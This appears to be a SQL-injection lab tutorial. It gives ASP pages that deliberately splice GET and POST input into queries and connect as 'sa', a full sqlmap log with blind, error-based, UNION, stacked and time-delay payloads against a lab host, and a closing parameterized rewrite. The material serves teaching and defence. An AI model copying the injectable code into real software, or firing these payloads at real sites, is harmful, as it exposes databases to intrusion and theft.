<%
dim prodId
prodId = Request.QueryString("id")
set conn = server.createObject("ADODB.Connection")
set rs = server.createObject("ADODB.Recordset")
' the id parameter is concatenated straight into the SQL text: this is the injection point of the lab
query = "select prodName from products where id = " & prodId
conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=数据库; User Id=sa; Password=密码"
rs.activeConnection = conn
rs.open query
if not rs.eof then
response.write "Got product " & rs.fields("prodName").value
else
response.write "No product found"
end if
%>
SQL statements: create the database table, then query it
create table products
(
id int identity(1,1) not null,
prodName varchar(50) not null
)
insert into products(prodName) values('1')
insert into products(prodName) values('2')
insert into products(prodName) values('3')
root@Dis9Team:/pen# sqlmap -u "http://5.5.5.134/sql.asp?id=1" --dbs
sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:10:54
[13:10:55] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file
[13:10:55] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[13:10:55] [INFO] testing connection to the target url
[13:10:55] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2431=2431
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1 AND 5223=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (5223=5223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)))
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=-3220 UNION SELECT CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(102)+CHAR(75)+CHAR(122)+CHAR(97)+CHAR(84)+CHAR(120)+CHAR(83)+CHAR(79)+CHAR(83)+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1 WAITFOR DELAY '0:0:5'--
---
[13:10:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[13:10:55] [INFO] fetching database names
[13:10:55] [INFO] the SQL query used returns 5 entries
[13:10:55] [INFO] retrieved: "master"
[13:10:55] [INFO] retrieved: "model"
[13:10:55] [INFO] retrieved: "msdb"
[13:10:55] [INFO] retrieved: "myDB"
[13:10:55] [INFO] retrieved: "tempdb"
available databases [5]:
[*] master
[*] model
[*] msdb
[*] myDB
[*] tempdb
[13:10:55] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'
[*] shutting down at 13:10:55
root@Dis9Team:/pen#
--------------------------------------------------- the great divider --
POST-based SQL injection
SQL:
create table users
(
userId int identity(1,1) not null,
userName varchar(50) not null,
userPass varchar(20) not null
)
insert into users(userName, userPass) values('john', 'doe')
insert into users(userName, userPass) values('admin', 'wwz04ff')
insert into users(userName, userPass) values('fsmith', 'mypassword')
ASP:
<%
dim userName, password, query
dim conn, rs
userName = Request.Form("userName")
password = Request.Form("password")
set conn = server.createObject("ADODB.Connection")
set rs = server.createObject("ADODB.Recordset")
' both form fields are concatenated straight into the SQL text: this is the injection point of the lab
query = "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'"
conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=myDB; User Id=sa; Password="
rs.activeConnection = conn
rs.open query
' count(*) always returns exactly one row, so rs.eof is never true here; test the returned count instead
if rs.fields(0).value > 0 then
response.write "Logged In"
else
response.write "Bad Credentials"
end if
%>
HTML submit form:
<form name="frmLogin" action="ASP.asp" method="post">
Username: <input type="text" name="userName">
Password: <input type="text" name="password"><input type="submit"></form>
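For comparison, here are both lookups of this page (the GET product query and the POST login) rewritten with ADODB.Command parameters, so the request values are bound as data and never spliced into the SQL text. This is an added example, not code from the original post; it assumes the `products` and `users` tables created above, and the `webapp` login with password `CHANGE_ME` is a hypothetical placeholder for a least-privilege account in place of `sa`.

```vbscript
<%
' Added example (not part of the original post): the two lookups of this page rewritten with
' ADODB.Command parameters, so request values are bound as data and never become SQL text.
' Assumes the products/users tables created above; "webapp"/CHANGE_ME is a hypothetical
' least-privilege login standing in for sa.
Option Explicit
Const adCmdText = 1, adParamInput = 1, adInteger = 3, adVarChar = 200
Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=myDB; User Id=webapp; Password=CHANGE_ME"

' GET lookup: id must pass IsNumeric and is bound as an integer, so "1 AND 2431=2431" or
' "1; WAITFOR DELAY '0:0:5'" never reaches the server as part of a statement.
Function ProductName(rawId)
    Dim cmd, rs
    ProductName = ""
    If Not IsNumeric(rawId) Then Exit Function
    Set cmd = Server.CreateObject("ADODB.Command")
    cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "select prodName from products where id = ?"
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CLng(rawId))
    Set rs = cmd.Execute
    If Not rs.EOF Then ProductName = rs.Fields("prodName").Value
    rs.Close
End Function

' POST login: both fields are bound as varchar parameters, so a quote in either one is
' compared as a character rather than parsed as the end of a string literal.
Function CredentialsValid(userName, password)
    Dim cmd, rs
    Set cmd = Server.CreateObject("ADODB.Command")
    cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "select count(*) from users where userName = ? and userPass = ?"
    cmd.Parameters.Append cmd.CreateParameter("u", adVarChar, adParamInput, 50, userName)
    cmd.Parameters.Append cmd.CreateParameter("p", adVarChar, adParamInput, 20, password)
    Set rs = cmd.Execute
    CredentialsValid = (rs.Fields(0).Value > 0)   ' count(*) always returns a row, so test the count
    rs.Close
End Function

If Request.QueryString("id") <> "" Then
    Dim name: name = ProductName(Request.QueryString("id"))
    If name = "" Then Response.Write "No product found" Else Response.Write "Got product " & Server.HTMLEncode(name)
ElseIf Request.Form("userName") <> "" Then
    If CredentialsValid(Request.Form("userName"), Request.Form("password")) Then Response.Write "Logged In" Else Response.Write "Bad Credentials"
End If
conn.Close
%>
```

With this version the sqlmap probes shown above arrive at SQL Server as parameter values, not as statement text, and the `webapp` login only needs SELECT on the two tables rather than the `sa` rights the lab uses.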